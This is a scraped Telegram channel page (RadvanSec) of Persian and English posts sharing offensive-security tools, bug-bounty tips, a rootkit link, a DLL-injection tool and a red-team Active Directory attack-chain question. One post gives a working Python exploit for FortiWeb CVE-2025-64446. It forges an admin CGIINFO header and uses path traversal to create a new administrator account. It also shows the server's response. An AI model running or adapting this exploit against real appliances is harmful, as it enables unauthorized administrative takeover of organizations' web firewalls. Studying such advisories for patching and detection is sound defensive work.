NEW BOT Телеграм, страница

RadvanSec

#tools
#OSINT
#Offensive_security
POC : OSINT with LLM
https://github.com/mouna23/OSINT-with-LLM
// This repository demonstrates domain, IP, and email reconnaissance with LLM-powered security reporting

See also:
]-> RAG OSINT Tool
]-> LLM OSINT PoC Tool
]-> OSINT LLM Collector and Analyser
]-> AI-powered subdomain enumeration
tool with local LLM analysis via Ollama

@Radvansec

❤5👍2

568 views‌ ‌⁮reza, edited 08:58

RadvanSec

سلام بچه ها امیدوارم خوب باشید؛
لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه هست .
تاجایی باید پیش برید که یک قدم تا کشف آسیب پذیری فاصله داشته باشید و ادامه کار کاملا منوال باید باشه
شما باید حدااقل بتونید روزی ۵ آسیب پذیری ولید ازش گزارش کنید البته رویکردی که خود اتومیشن داره باید درست باشه و پیشنهاد این هست که VPS های متعدد داشته باشید که هرکدوم رویکرد مناسب داشته
باشن تا بتونید آسیب پذیری های متنوعی ازش گزارش کنید

نکته خیلی مهم : تمرکز روی یک آسیب پذیری خاص و نادیده گرفتن مابقی = سم (کار اشتباه)

نکته دوم :‌ با AI ترکیب کنید فارغ از نتیجه ای که داره روند کار خیلی لذت بخش براتون خواهد بود 😁

⭐️ @RadvanSec

🔥8👏1

1.41K viewsedited 16:08

RadvanSec

سلام دوستان لایو دوره خصوصی بوده و لایو پابلیک رسمی کانال نبوده اگر دوست دارید ری اکشن بدید یک لایو پابلیک بریم و کامل AI + Security و agent هایی که خودتون میتونید بسازید رو باهم درموردش صحبت کنیم

👍25👎1🔥1

545 viewsReza Mohamadzade, edited 17:26

RadvanSec

Forwarded from SecCode (Meisam Monsef)

شهادت حضرت فاطمه زهرا (س) تسلیت باد
@SecCode

💔20❤6👎5

497 viewsReza Mohamadzade, 05:25

RadvanSec

DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎

Check it out! 👇
https://github.com/kevin-mizu/domloggerpp

@Radvansec

❤4👍1

780 views‌ ‌⁮reza, edited 10:12

RadvanSec

CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass

So, based on THIS, you can get something like this:


import base64, json, subprocess
header = base64.b64encode(json.dumps({
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
}).encode()).decode()

payload = json.dumps({
    "data": {
        "q_type": 1,
        "name": "note2",
        "access-profile": "prof_admin",
        "password": "note2",
        "comment": "automated RCE"
    }
})

cmd = [
    "curl", "--path-as-is", "-sk",
    "-H", f"CGIINFO: {header}",
    "-H", "Content-Type: application/json",
    "--data", payload,
    "https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY

Output from the box:

{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }

⭐️ @RadvanSec

Gist

FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446

FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446 - CVE-2025-64446.md

❤3👍2

679 viewsSin0x001, 10:51

RadvanSec

شغل قبلی تریاژر های Bugcrowd 🤡

⭐️ @RadvanSec

🤣18❤1

696 viewsSin0x001, edited 05:24

RadvanSec

Forwarded from GO-TO CVE

سوال ردتیم :

یک AD کامل پچ‌شده (Server 2025 + Defender for Identity + Tier 0 isolation + LDAP signing/enforcement + SMB signing) داری.
بدون credential اولیه، بدون physical، بدون zero-day عمومی، حداکثر چند روز طول می‌کشه تا Golden Ticket بگیری؟
chain کامل رو بنویس (از initial foothold تا DCSync، فقط با تکنیک‌های ۲۰۲۵ که الان کار می‌کنن).

❤‍🔥3❤2

450 viewsReza Mohamadzade, 06:31

RadvanSec

Forwarded from ReverseEngineering

A Linux eBPF rootkit with a backdoor C2 library injection execution hijacking persistence and stealth capabilities

https://github.com/h3xduck/TripleCross

@reverseengine

GitHub

GitHub - h3xduck/TripleCross: A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and…

A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities. - h3xduck/TripleCross

❤3

507 viewsSin0x001, 05:53

RadvanSec

Forwarded from PentesterLand Academy - Public

⁨ دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی 😉
دوس داشتی بفرس برای دوستات که میخوان سریع حکر بشن⁩

https://www.instagram.com/reel/DRkNUj8Db2L/?igsh=MXdocTZ4azAyODhpMg==

Instagram

@pentesterland

⁨
⁨
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی…

❤5👍2

424 viewsReza Sh, 16:08

RadvanSec

OWASP_AI_Testing_Guide.pdf

6.2 MB

#MLSecOps
#Whitepaper
#Threat_Modelling
"OWASP AI Testing Guide", Version 1, Nov. 2025.
]-> Repo

// This Guide is designed to serve as a comprehensive reference for software developers, architects, data analysts, researchers, auditors and risk officers, ensuring that AI risks are systematically addressed throughout the product development lifecycle

@Radvansec

❤8

670 views‌ ‌⁮reza, edited 09:19

RadvanSec

Forwarded from PentesterLand Academy - Public

اگه میخوای بیشتر XSS هات P2,P1 بشن از نکته زیر استفاده کن
۹۹ درصد باگ هانترا (صرفا باگ هانترا) راجب این تکنیک چیزی نمیدونن ولی وقتی ترکیبش میکنی تو گزارشت تریاژر خوف میکنه رسما
سعی کن هکر باشی ❤️‍🔥😉

https://x.com/pentesterlanden/status/1994795913488077214?s=46

X (formerly Twitter)

PentesterLand (@PentesterLandEn) on X

Consider incorporating SVG Smuggling and HTMLSmuggling vectors into your bug bounty reports(XSS).
They frequently result in higher-impact findings and increased bounty rewards.
Trust me😉
by these techniques, over 70% of them escalated to P2/P1 severity
#bugbountytips…

❤7

301 viewsReza Sh, 15:52

RadvanSec

0:08

This media is not supported in your browser

VIEW IN TELEGRAM

Injecting a DLL into an Explorer process using icons

https://github.com/d419h/IconJector

⭐️ @RadvanSec

❤3👍1

476 viewsSin0x001, edited 08:21

RadvanSec

Forwarded from لیان - آموزش امنیت و تست‌نفوذ

امروز روز جهانی امنیت سایبری است؛ روزی برای یادآوری یک واقعیت مهم:
هر کلیک می‌تواند مخاطره‌آمیز باشد، هر ایمیل بالقوه یک تهدید است و هر بی‌احتیاطی ممکن است پیامدهای جدی و جبران‌ناپذیری به‌دنبال داشته باشد.
امنیت صرفاً به ابزارها وابسته نیست؛ بخش بزرگی از آن به رفتار و دقت ما بازمی‌گردد.
به همین دلیل، امروز فرصتی مناسب است تا چند اقدام ساده اما حیاتی را مرور کنیم: استفاده از گذرواژه‌های امن و پیچیده، پرهیز از باز کردن پیام‌ها و پیوست‌های مشکوک، و توجه به ارزش واقعی داده‌هایی که در اختیار داریم.
در جهانی که هر روز بیش از گذشته دیجیتالی می‌شود، توجه به امنیت اطلاعات باید به یک عادت جدی و همیشگی تبدیل شود.

💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian

Please open Telegram to view this post

VIEW IN TELEGRAM

❤6

441 viewsReza Mohamadzade, 11:25

RadvanSec

CVE-2025-47776 - 1day, MantisBT vulnerable to authentication bypass for some passwords due to PHP type juggling

#Pruva today reproduction and exploit.

Exploit

⭐️ @RadvanSec

❤4👍2🔥1👏1

525 viewsSin0x001, 04:46

RadvanSec

Web Application Security-Persian.pdf

9.7 MB

@web_articles

⭐️ @RadvanSec

❤6👍2

560 viewsSin0x001, edited 10:22

RadvanSec

The_Web_Application_Hacker's_Handbook_Finding_and_Exploiting_Security.pdf

14 MB

⭐️ @RadvanSec